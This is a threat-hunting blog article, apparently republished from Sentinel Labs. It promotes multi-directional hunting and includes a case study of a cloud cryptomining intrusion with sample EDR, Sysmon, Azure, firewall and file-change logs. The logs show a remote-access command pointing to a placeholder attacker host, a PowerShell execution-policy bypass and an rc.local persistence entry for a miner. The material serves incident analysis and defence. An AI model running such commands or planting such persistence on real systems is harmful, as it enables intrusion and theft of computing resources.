Automating the on-demand collection of memory dumps, process information, system files, and event logs for inclusion in threat-hunting activities allows for a more comprehensive and proactive approach to adaptive threat-hunting. In the WatchTower Threat Hunting blog series, Sentinel Labs calls out some adaptive threat-hunting methodologies, including Chained Detections, a Multi-Directional Approach, and AI-powered hunts. This shows the benefits of applying a multi-directional approach to adaptive threat hunting.
The evolution of adaptive threat hunting continues to deliver more ways of automating detection, investigation, and response processes. As these processes continue to integrate, threat hunting, digital forensics, incident response, and security operations converge into a more unified workflow. This shift enables us to move beyond security events and system logs when conducting hunts, incorporating automated collection of more diverse data sources, increasing the fidelity of detections and delivering higher accuracy when determining the level of risk.[1]
Beyond Telemetry - In the telemetry-only approach, threat hunting primarily relies on analyzing data from EDR sources originating on a host system. The focus is on identifying suspicious patterns, anomalies, or known indicators of compromise (IoCs) within this telemetry data. While this approach detects many threats, it may not provide a complete picture of advanced or stealthy attacks. It lacks visibility into system memory, event logs, registries, and file system activities. Recognizing the limitations of telemetry-only hunting, organizations move towards a complete strategy that includes several data sources and incorporates new methods, such as chained detections with automated triage in their threat-hunting practices.
Sampling is one technique that enables us to have a broader reach, adding speed and scale to our hunts. This consists of an automated examination of a selected group of systems to gain deeper insights into potential threats that exist in the environment. These sample systems are often chosen based on initial telemetry detections or suspicious activities. Some may be selected because they are high-value targets that always benefit from more rigorous monitoring and recurring health checks. This sampling of triage scans can include light forensics activities that focus on real-time memory, process, and file system analysis instead of imaging an entire disk or performing a full memory dump. These activities are crucial for detecting advanced threats that may not leave obvious traces in telemetry data.
Memory analysis focuses on identifying malicious processes, code injection, and in-memory artifacts that could indicate an active threat. File system analysis involves inspecting files and directories for signs of malware, unauthorized changes, or suspicious file properties. Security tools integration and a performant, centralized data repository become critical for implementing these advanced threat detection activities, allowing for deeper analysis of disparate data.
Specialized security platforms offer these advanced capabilities today to help organizations adopt a holistic, multidirectional approach to adaptive threat hunting. The goal is to combine the insights from endpoint telemetry data analysis with the findings from triage scans and event logs. This integrated approach provides a more comprehensive view of the threat landscape and helps identify both known and unknown threats.
Understanding the Multi-Directional Approach to Threat Hunting - Threat hunting is inherently exploratory. Security analysts actively search for threats, vulnerabilities, and weaknesses, explore inventories, and learn as much as possible about the environment by asking questions, forming hypotheses, and conducting in-depth investigations. This approach leads to a deeper understanding of the organization’s asset inventory and security landscape. Below are some key aspects of this new approach that can help guide implementation in your environment.
- Telemetry Diversity – It starts with leveraging existing EDR telemetry and combining that with additional data sources such as event logs, traffic analysis, cloud activity, forensic data, and application logs to gain a more complete view of the environment and impact.
- Sweeps and Scans (Sampling)—File system scans and memory sweeps of key systems are critical for uncovering hidden threats such as file-less malware and advanced persistence mechanisms (e.g., implants). These sweeps involve scanning and analyzing files and memory for malicious patterns and discovering anomalies.
- LFO (Low Frequency of Occurrence) and Statistics – LFO and statistical analysis help detect subtle, slow-moving threats that may evade traditional security measures. These techniques focus on long-term trends and low-frequency detections that may indicate future compromise.
- Automation and Manual Investigation—Threat hunting is supported by both automated processes and manual investigation. Automation (see chained detections) helps quickly sift through large datasets and prioritize alerts, while manual investigation allows analysts to triage events or clusters of events of interest, delve deeper into complex threats, and apply human expertise.
- Algorithmic Detections (AI and ML)—Artificial intelligence and machine learning can deliver algorithms and statistical models used to identify patterns and anomalies through predictive and behavioral analysis. They can identify deviations from normal behavior and alert security teams to potential threats in complex and dynamic environments.
Case Study | A Cryptocurrency Takeover via Cloud Application Exploitation
Attack Overview - In this real-world scenario, a threat actor exploited a vulnerability in a cloud-based application hosted on a public cloud platform. The attacker gained unauthorized access to the application’s underlying operating system, leveraged this initial foothold to escalate privileges, gained control over the cloud infrastructure, and subsequently deployed several virtual machines (VMs) for Bitcoin mining, consuming the organization’s cloud resources.
Initial Detection and EDR Alert - The attack was first detected when an Endpoint Detection and Response (EDR) agent identified anomalous user behavior on the operating system hosting the vulnerable cloud application. The EDR alert was triggered by the unusual use of an administrative account (cloud-admin) to launch remote access tools, which had not been observed previously.
Sample EDR Log (Anomalous User Activity):
Log Name: EDR Security Logs
Source: SentinelOne EDR
Date: 2024-08-05 08:12:34
Event ID: 1001
Task Category: User Activity Monitoring
Level: High
Description: Anomalous user activity detected.
User:
Account Name: cloud-admin
Account Domain: CLOUD
Logon ID: 0x3e7
Privilege Level: Administrator
Activity:
Process: C:\Program Files\RemoteAccessTool\remote.exe
Command Line: "remote.exe -silent -connect attacker-ip -port 443"
Network Connection: Established to IP xxx.xxx.xxx.xxx on port 443
Alert Details:
The remote access tool was executed by an administrative account that typically does not initiate remote connections.
This activity is flagged as potentially malicious.
An Expanded Investigation Leveraging Multi-Directional Threat Hunting - Realizing the severity of the situation, the threat-hunting team expanded their investigation to understand the full scope of the compromise. They utilized multiple data sources, including process execution logs, network traffic analysis, cloud infrastructure logs, and threat intelligence, to assemble the attack timeline.
Process Information and Execution Logs:
Analysis: The Sentinel team analyzed the process execution logs on the compromised server and identified that the attacker had used the cloud-admin account to execute a series of commands designed to escalate privileges and initiate the deployment of additional VMs within the cloud environment.
Sample Log (Process Execution via Sysmon):
Event ID: 1
Provider: Microsoft-Windows-Sysmon
TimeCreated: 2024-08-05 08:15:20
EventDescription: Process Create
ProcessId: 6720
Image: C:\Windows\System32\cmd.exe
CommandLine: "cmd.exe /c powershell -ExecutionPolicy Bypass -File deploy-vm.ps1"
ParentProcessId: 5504
User: CLOUD\cloud-admin
Forensic Artifacts: The attacker utilized a PowerShell script named deploy-vm.ps1, which contained commands to automate the creation and configuring of new VMs in the cloud environment. This script was located in the C:\Windows\Temp\ directory, suggesting that the attacker temporarily placed it.
Forensic Artifacts: The attacker created a resource group named MinersGroup and deployed multiple VMs with high computational power specifically designed for cryptocurrency mining. The logs also indicated that these VMs were made in a different geographic region (East U.S.) than the organization’s standard operating region, raising suspicion.
Cloud Infrastructure Logs—Analysis: We reviewed cloud infrastructure logs to identify the creation of new resources. The logs revealed several VMs were spun up shortly after the initial compromise, all under the compromised cloud-admin account.
Sample Cloud Log (VM Deployment Event):
Log Name: Cloud Infrastructure Logs
Source: Azure Activity Logs
Date: 2024-08-05 08:20:45
Event ID: 3000
Task Category: Virtual Machine Deployment
Level: Information
Description: A new virtual machine instance was created.
User:
Account Name: cloud-admin
Subscription ID: 1234abcd-5678-efgh-9012-ijklmnopqrst
Resource Group: MinersGroup
VM Details:
VM Name: VM-Miner01
VM Size: Standard_D4s_v3
Location: East US
OS Type: Linux
Image: UbuntuServer
Network Interface: NIC01
Activity: VM successfully created and initiated at 08:20:45 UTC.
Network Traffic Analysis—Analysis: Network traffic analysis identified communications between the compromised systems and any external IP addresses. They found that the newly deployed VMs consistently communicated with a known cryptocurrency mining pool’s IP address.
Sample Network Log (Firewall):
Time: 2024-08-05 08:25:00
Source IP: 10.20.30.40 (VM-Miner01)
Destination IP: 192.0.2.25 (MiningPool)
Protocol: TCP
Destination Port: 3333
Action: Allow
Bytes Sent: 50,000,000
Forensic Artifacts: The continuous outbound traffic to the mining pool’s IP address, particularly over ports commonly used for mining operations (e.g., port 3333), confirmed that the VMs were being used for cryptocurrency mining.
System Files and Configuration Changes - Analysis: The threat-hunting team analyzed system files and configuration settings on the compromised server and the newly created VMs. They discovered that the attacker had modified critical configuration files to maintain persistence and avoid detection.
Sample System File Change (Linux VM Configuration):
File: /etc/rc.local
Modification Time: 2024-08-05 08:30:10
Content:
#!/bin/sh -e
# Custom startup script for mining operations nohup /usr/local/bin/miner --config /etc/miner.conf & exit 0
Forensic Artifacts: The modification of the /etc/rc.local file on the Linux VMs ensured that the mining software would start automatically on reboot, providing the attacker with persistent mining operations.
Threat Intelligence Correlation - Analysis: The team leveraged threat intelligence to correlate the attack with known threat actors and campaigns. By analyzing the tools, techniques, and procedures (TTPs) used, they identified the attacker as part of a known cybercrime group that frequently targets cloud environments for cryptocurrency mining.
Sample Threat Intelligence Report (Attribution):
Threat Actor: CryptoMinersGroup
TTPs:
- Exploitation of cloud application vulnerabilities
- Use of compromised administrative credentials
- Deployment of cryptocurrency mining software on cloud infrastructure
Associated Indicators:
- C2 Server IP: x.x.x.x
- Mining Pool IP: x.x.x.x
- Tools: PsExec, RemoteAccessTool, Custom Miner
Forensic Artifacts: The correlation of IP addresses and TTPs with known threat intelligence confirmed that the attackers compromised and utilized the systems within the MinersGroup resource group while other parts of the cloud infrastructure remained unaffected.
Lessons Learned - The investigation revealed that the attackers had exploited a vulnerability in a cloud application to gain initial access to the underlying operating system. They escalated privileges, took control of the cloud environment, and deployed multiple VMs for cryptocurrency mining. The hard lessons learned by the security organization include the following.
Secure Configuration and Patch Management:
- Regularly patch vulnerabilities in cloud applications and underlying infrastructure.
- Implement robust configurations to minimize attack surfaces.
- Continuous Monitoring of Cloud Environments:
- Use cloud-native security tools and enable comprehensive logging for real-time threat detection.
- Monitor VM deployments and resource usage to detect abnormal activity early.
Identity Threat Detection and Response (ITDR) and Privileged Access Management (PAM):
- Implement strict privilege escalation controls to prevent lateral movement.
- Enforce least-privilege access policies for cloud services.
- Implement ITDR at the endpoint and CIEM at the cloud level to identify abuses in privilege and lateral movement across the environment.
Scalability of Incident Response:
- Prepare for large-scale attacks by designing incident response processes to scale with cloud resources.
- Automate containment and remediation workflows where feasible to reduce impact.
Proactive Cloud Security Posture - Regularly assess cloud configurations and perform security posture reviews. Conduct continuous threat modeling to anticipate potential attack paths.
This case highlights the importance of continuously monitoring cloud infrastructure, promptly patching vulnerabilities, and leveraging comprehensive threat-hunting strategies, considering multiple data sources to detect and respond to advanced threats. By automating the collection and correlation of these data sources, the organization could quickly identify the compromise, limit the impact, and prevent further exploitation.
Conclusion—Many security teams are moving away from a telemetry-only approach to explore more comprehensive, multidirectional threat-hunting strategies. By integrating memory, logs, and file system analysis, organizations can proactively identify and respond to a broader spectrum of threats, including those that exploit hidden vulnerabilities within the operating system. This approach enhances overall security posture and significantly reduces the dwell time of threats within the network.
While implementing such an advanced strategy may be challenging for many internal security teams, partnering with our strategic services team, PinnacleOne, utilizing the right tools, and engaging experienced service providers makes this attainable over time.
This article is shared at no charge and is for educational and informational purposes only.
Red Sky Alliance provides Cyber Threat Analysis and Intelligence Services for our clients. Thanks again to Sentinel Labs for sharing these significant observations. Red Sky Alliance provides valuable indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5378972949933166424
[1] https://www.sentinelone.com/blog/adaptive-threat-hunting-adopting-a-multi-directional-approach/
Comments